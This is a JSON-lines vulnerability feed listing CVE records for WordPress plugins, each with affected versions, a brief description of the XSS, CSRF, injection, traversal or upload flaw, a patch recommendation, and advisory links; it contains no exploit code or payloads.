{"CVE_ID":"CVE-2023-4376","slug":"serial-codes-generator-and-validator","versionEndExcluding":"2.4.15","description":"The Serial Codes Generator and Validator with WooCommerce Support WordPress plugin before 2.4.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.4.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13910e52-5302-4252-8bee-49dd1f0e180a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13910e52-5302-4252-8bee-49dd1f0e180a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5804","slug":"cf7-conditional-fields","versionImpact":"2.4.13","versionEndExcluding":"2.4.14","description":"The Conditional Fields for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.13. This is due to missing or incorrect nonce validation on the wpcf7cf_admin_init function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c5dc2-3195-47d9-9e44-ca2043748eed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827c5dc2-3195-47d9-9e44-ca2043748eed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-conditional-fields\\\/trunk\\\/wpcf7cf-options.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-conditional-fields\\\/trunk\\\/wpcf7cf-options.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121497%40cf7-conditional-fields&new=3121497%40cf7-conditional-fields&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3121497%40cf7-conditional-fields&new=3121497%40cf7-conditional-fields&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5340","slug":"food-and-drink-menu","versionImpact":"2.4.10","versionEndExcluding":"2.4.11","description":"The Five Star Restaurant Menu and Food Ordering WordPress plugin before 2.4.11 unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.","recommendation":"Update to version 2.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91a5847a-62e7-4b98-a554-5eecb6a06e5b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91a5847a-62e7-4b98-a554-5eecb6a06e5b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1954","slug":"oliver-pos","versionImpact":"2.4.1.8","versionEndExcluding":"2.4.1.9","description":"The Oliver POS \u2013 A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1.8. This is due to missing or incorrect nonce validation in the includes\/class-pos-bridge-install.php file. This makes it possible for unauthenticated attackers to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d16ce2-a1cf-4402-b140-3cab17f8c638?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035108%40oliver-pos&new=3035108%40oliver-pos&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13441","slug":"bilingual-linker","versionImpact":"2.4","versionEndExcluding":"2.4.1","description":"The Bilingual Linker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the bl_otherlang_link_1 parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bilingual-linker\\\/tags\\\/2.4\\\/bilingual-linker.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bilingual-linker\\\/tags\\\/2.4\\\/bilingual-linker.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daeda8d7-1bff-4258-9953-b4303f1778d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daeda8d7-1bff-4258-9953-b4303f1778d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1399","slug":"menu-ordering-reservations","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The Restaurant Menu \u2013 Food Ordering System \u2013 Table Reservation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d419d9e-73c5-4d14-8da0-27a90924e0b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d419d9e-73c5-4d14-8da0-27a90924e0b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3064578%40menu-ordering-reservations%2Ftrunk&old=3022834%40menu-ordering-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3064578%40menu-ordering-reservations%2Ftrunk&old=3022834%40menu-ordering-reservations%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4793","slug":"blog-designer-for-post-and-widget","versionEndExcluding":"2.4.1","description":"The Blog Designer WordPress plugin before 2.4.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00c34ba8-b82e-4bb9-90b1-1afefae75948\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00c34ba8-b82e-4bb9-90b1-1afefae75948\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8981","slug":"broken-link-checker","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The Broken Link Checker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg in \/app\/admin-notices\/features\/class-view.php without appropriate escaping on the URL in all versions up to, and including, 2.4.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/429fe34a-5fa9-4032-9b21-4de114dbc9d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/429fe34a-5fa9-4032-9b21-4de114dbc9d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159860\\\/broken-link-checker\\\/trunk\\\/app\\\/admin-notices\\\/features\\\/class-view.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159860\\\/broken-link-checker\\\/trunk\\\/app\\\/admin-notices\\\/features\\\/class-view.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.0\\\/app\\\/admin-notices\\\/features\\\/class-view.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.0\\\/app\\\/admin-notices\\\/features\\\/class-view.php#L43\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3469","slug":"gp-premium","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The GP Premium plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the message parameter in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a697391-f30d-403f-9046-8fa219a49302?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a697391-f30d-403f-9046-8fa219a49302?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13118","slug":"ip-based-login","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The IP Based Login WordPress plugin before 2.4.1 does not have CSRF checks in some places, which could allow attackers to make logged in users delete all logs via a CSRF attack","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba6f98e-b931-4f02-b190-ca855a674839\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eba6f98e-b931-4f02-b190-ca855a674839\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5419","slug":"cf7-widget-elementor","versionImpact":"2.4","versionEndExcluding":"2.4.1","description":"The Void Contact Form 7 Widget For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cf7_redirect_page' attribute within the plugin's Void Contact From 7 widget in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2837c9b2-419e-453a-b011-5ec1ef050d62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2837c9b2-419e-453a-b011-5ec1ef050d62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-widget-elementor\\\/tags\\\/2.4\\\/widgets\\\/void-section-cf7.php#L1672\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-widget-elementor\\\/tags\\\/2.4\\\/widgets\\\/void-section-cf7.php#L1672\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109802\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109802\\\/#file6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4455","slug":"yith-woocommerce-ajax-search","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The YITH WooCommerce Ajax Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018item\u2019 parameter in versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0f5fd4-cd06-4d11-9f22-1f417b546afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0f5fd4-cd06-4d11-9f22-1f417b546afb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-woocommerce-ajax-search\\\/trunk\\\/includes\\\/admin\\\/class-yith-wcas-admin-statistic-list-table.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-woocommerce-ajax-search\\\/trunk\\\/includes\\\/admin\\\/class-yith-wcas-admin-statistic-list-table.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091321\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091321\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6231","slug":"request-a-quote","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The Request a Quote WordPress plugin before 2.4.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75ad1d8f-edc3-4eb3-b4c0-73832c0a4ca0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75ad1d8f-edc3-4eb3-b4c0-73832c0a4ca0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12800","slug":"ip-based-login","versionImpact":"2.4.0","versionEndExcluding":"2.4.1","description":"The IP Based Login WordPress plugin before 2.4.1 does not sanitise values when importing, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f1ceca5-3b7b-4cf0-bccd-03e204e5bfad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f1ceca5-3b7b-4cf0-bccd-03e204e5bfad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7062","slug":"file-manager-advanced-shortcode","versionImpact":"2.4","versionEndExcluding":"2.4.1","description":"The Advanced File Manager Shortcodes plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4. This makes it possible for attackers with contributor access or higher to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bf009f5-cf9e-4d38-9679-d3abb5817d30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bf009f5-cf9e-4d38-9679-d3abb5817d30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"name\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36745","slug":"wedevs-project-manager","versionEndExcluding":"2.4.1","description":"The WP Project Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.0. This is due to missing or incorrect nonce validation on the do_updates() function. This makes it possible for unauthenticated attackers to trigger updates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/456c13f5-4a8b-4eea-a2a0-f37f8508551b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/456c13f5-4a8b-4eea-a2a0-f37f8508551b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.4.1\\\/core\\\/Upgrades\\\/Upgrade.php?rev=2368374#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.4.1\\\/core\\\/Upgrades\\\/Upgrade.php?rev=2368374#L179\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11749","slug":"appizy-app-embed","versionImpact":"2.3.2","versionEndExcluding":"2.4.0","description":"The App Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'appizy' shortcode in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216285%40appizy-app-embed&new=3216285%40appizy-app-embed&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216285%40appizy-app-embed&new=3216285%40appizy-app-embed&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a0507-aa51-4e4e-a582-9007041c811b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/111a0507-aa51-4e4e-a582-9007041c811b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12854","slug":"garden-gnome-package","versionImpact":"2.3.0","versionEndExcluding":"2.4.0","description":"The Garden Gnome Package plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the functionality that automatically extracts 'ggpkg' files that have been uploaded in all versions up to, and including, 2.3.0. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215986%40garden-gnome-package&new=3215986%40garden-gnome-package&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215986%40garden-gnome-package&new=3215986%40garden-gnome-package&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bcfc8f1-e962-4ad7-8a9d-89ce5c9022b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bcfc8f1-e962-4ad7-8a9d-89ce5c9022b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0248","slug":"eazydocs","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The EazyDocs WordPress plugin before 2.4.0 re-introduced CVE-2023-6029 (https:\/\/wpscan.com\/vulnerability\/7a0aaf85-8130-4fd7-8f09-f8edc929597e\/) in 2.3.8, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents\/sections. The issue was partially fixed in 2.3.9.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0507","slug":"ploxel","versionImpact":"2.3.6","versionEndExcluding":"2.4.0","description":"The Ticketmeo \u2013 Sell Tickets \u2013 Event Ticketing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ploxel\\\/tags\\\/2.2.0\\\/ploxel.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ploxel\\\/tags\\\/2.2.0\\\/ploxel.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231203\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231203\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/149edbdf-4a27-4d79-8dd1-b5b3efbf648b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/149edbdf-4a27-4d79-8dd1-b5b3efbf648b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11330","slug":"custom-css","versionImpact":"2.3.0","versionEndExcluding":"2.4.0","description":"The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css\\\/tags\\\/2.3.0\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css\\\/tags\\\/2.3.0\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194786\\\/custom-css\\\/trunk\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194786\\\/custom-css\\\/trunk\\\/includes\\\/settings\\\/class-alg-custom-css-js-php-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3497974d-cf58-4b38-a2c9-9bcd119ef43e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3497974d-cf58-4b38-a2c9-9bcd119ef43e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8721","slug":"tracking-code-manager","versionImpact":"2.3.0","versionEndExcluding":"2.4.0","description":"The Tracking Code Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the tracking code field in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211908%40tracking-code-manager&new=3211908%40tracking-code-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211908%40tracking-code-manager&new=3211908%40tracking-code-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443d2e80-31db-40ac-9c35-88eec841ebba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/443d2e80-31db-40ac-9c35-88eec841ebba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8625","slug":"poll-wp","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The TS Poll  WordPress plugin before 2.4.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab4d7065-4ea2-4233-9593-0f540f91f45e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab4d7065-4ea2-4233-9593-0f540f91f45e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
